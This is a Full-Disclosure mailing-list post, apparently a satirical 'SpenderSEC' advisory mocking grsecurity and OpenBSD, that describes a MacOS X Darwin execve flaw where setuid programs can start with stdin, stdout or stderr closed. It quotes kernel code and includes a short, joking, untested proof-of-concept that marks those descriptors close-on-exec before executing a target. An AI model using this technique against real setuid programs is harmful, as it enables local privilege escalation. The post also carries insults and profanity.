[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] SpenderSEC Advisory #1



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=#
  ____    ___   ___          ____    ___   ___      ____   ___   ____
 /       |   \ |     |\   | |    \  |     |   |    /      |     |
 \____   |__ / |___  | \  | |     | |___  |___|    \____  |___  |
      \  |     |     |  \ | |     | |     |    \        \ |     |
 _____/  |     |___  |   \| |____/  |___  |     \  _____/ |___  |____

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=#
          PaX - WITH SOME ADDED FEATURES!@#$% !@#$% !@#$%
          RBAC - Reliable Binaries Always Compile
          SPEND ur money on ME!@#$%
          Banner Advertisement - Only $50 a month
          SPENDERSEC - PROUD SUPPORTER OF PROJEKT LIM3YC0N
          Fuck Niels!@#$% - Systrace is phor l0s3rZ
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=#

Being thankful to all people who donated money to the grsecurity security
project, I managed to provide myself with an Apple Powermac G5, not to
mention
multiple subscriptions to various interesting magazines (I had no idea
how
many things a girl could do with a tie and a cat), and start an extensive
audit of the Darwin MacOS X kernel.
It was not surprising that before long I discovered a tragic vulnerability
in the Darwin kernel that strips MacOS X security down to the bone.
Of course grsecurity would never make such mistakes; despite all the
overflows
in the ip options handling code we have multi-threaded PaX that will
not
allow execution of any code. The fact that no one can ever get their
computer
booted with grsecurity installed allows end-users to sleep securely,
if
somewhat disconnected from the information super highway.

The first major problem is present in the OpenBSD patch in at [1], where
the failure of falloc() results in a continuation of the loop, which
can
update the value of the error variable, resulting in either fd 0 or fd
1
not being correctly reopened to /dev/null while a successful falloc()
for
fd 2 sets error to a suitable value.

At this point it's a good idea to point out that a vast amount of internet
nodes, most notably backbone service providers are running MacOS X and
most
likely compromised by unsavoury internet denizens.

As you would expect from a product supported by the OpenBSD security
team,
and not the grsecurity team, which consists entirely of me and, primarily,
 my
ego, there is a second problem present at [3], where filedescriptors
with
the FD_CLOEXEC flag set get closed. The complete disregard for the order
in
which the sanitize-fd and fd-closing operations are performed should
be no
shock to users of non-spendersec supported operating systems.

The following code is present in bsd/kern/kern_exec.c

 int
 execve(p, uap, retval)
{

 [... snip ...]

/* Radar 2261856; setuid security hole fix */
/* Patch from OpenBSD: A. Ramesh */
/*
* XXX For setuid processes, attempt to ensure that
* stdin, stdout, and stderr are already allocated.
* We do not want userland to accidentally allocate
* descriptors in this range which has implied meaning
* to libc.
*/
        for (i = 0; i < 3; i++) {
                extern struct fileops vnops;
                struct nameidata nd1;
                struct file *fp;
                int indx;

                if (p->p_fd->fd_ofiles[i] == NULL) {
[1]                     if ((error = falloc(p, &fp, &indx)) != 0)
[2]                             continue;
                        NDINIT(&nd1, LOOKUP, FOLLOW, UIO_SYSSPACE,
                                                        "/dev/null", p);
                        if ((error = vn_open(&nd1, FREAD, 0)) != 0) {
                                ffree(fp);
                                p->p_fd->fd_ofiles[indx] = NULL;
                                break;
                        }
                        fp->f_flag = FREAD;
                        fp->f_type = DTYPE_VNODE;
                        fp->f_ops = &vnops;
                        fp->f_data = (caddr_t)nd1.ni_vp;
                        VOP_UNLOCK(nd1.ni_vp, 0, p);
                }
        }

[... snip ...]
        /*
         * Close file descriptors
         * which specify close-on-exec.
         */
[3]     fdexec(p);
[... snip ...]

In order to more fully demonstrate the severe implications of the problem,

spendersec has provided the world with a proof-of-concept example.

#define OVERRATED int
#define THEO (OVERRATED)NULL
#define GOD THEO
#define DEFINITE_SECURITY fcntl.h
#define WORLD_COLLAPSE exit(666);
#include <DEFINITE_SECURITY>

int
main(int spender, char **sec) {
        fcntl(0, F_SETFD, FD_CLOEXEC);
        fcntl(1, F_SETFD, FD_CLOEXEC);
        fcntl(2, F_SETFD, FD_CLOEXEC);

        if(spender <= GOD)
                WORLD_COLLAPSE;

        /* note that i overindex, but for systems running grsecurity
         * this is not a problem
         */
        execv(sec[1], sec[1], &sec[2]);
}

I haven't been able to test this code, as gcc does not work with the
GrSecurity kernel patch functionality. We are liasing with the PaX team
to
resolve the issues involved. Until such time that all issues are resolved
we
recommend that all spendersec customers disconnect their machines from
the
network. We at spendersec realise that this will cause problems with
the
online patching process. However, the cvshome.org team have gotten away
with
this for over two months now so: nyah nyah nyah. I'm more precocious
and
skilled than you, I understand advanced algrebra and cardinality... BOW
BEFORE ME.

At this point it's probably time to explain the concept behind spendersec.
Spendersec is the new groundbreaking paradigm that will reshape the
information security landscape. Spendersec is the commercial wing of
the
grsecurity project which aims to provide all the functionality of
grsecurity combined with a 24-hour support team managed by my ego while
I'm asleep.
My Ego is forced to man the technical support desks at SpenderSec because
whenever I try to use the telephone I tend to get the earpiece lodged
deep
within my ear and it's very difficult and painful to remove.

EXAMPLE TELEPHONE SUPPORT CALL:

Clueless Luser: Hi spendersec is not allowing me to execute _any_ code
at all!
                I can't even log in!

My EGO:         You aren't running OpenBSD are you?

Clueless Luser: No I am running RedHat 9, Shrike.

My EGO:         It sounds like you're running OpenBSD to me.

Clueless Luser: No, really I'm not.

My EGO:         Look, if you're going to run inferior Operating Systems,
                you're going to have problems. <HANGS UP>

Clueless Luser; I'm going to install Plan9


CONCLUSION:

It's apparent to me that the paradigm of grsecurity is unable to protect
users of the Darwin operating system; only spendersec, the proprietary
commercial wing of grsecurity, has the funding necessary to confront
the ever
changing needs of the non-linux user. At the time of writing all blame
is
apportioned to the selfish and lazy PaX team, which refuses to port PaX
to
any operating system other than linux. Fucking slashdot hippies.

Lots of love and hugs,
  -- spendersec <3
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkUEARECAAYFAkDVpdcACgkQqZhP2o1mQTXERACfQbIpQVIDeCP6ZJsK0XR7RkdUggIA
l1t5BRc+okDp4rV+W/36mLbLLzg=
=Pfig
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about.php?subloc=affiliate&l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html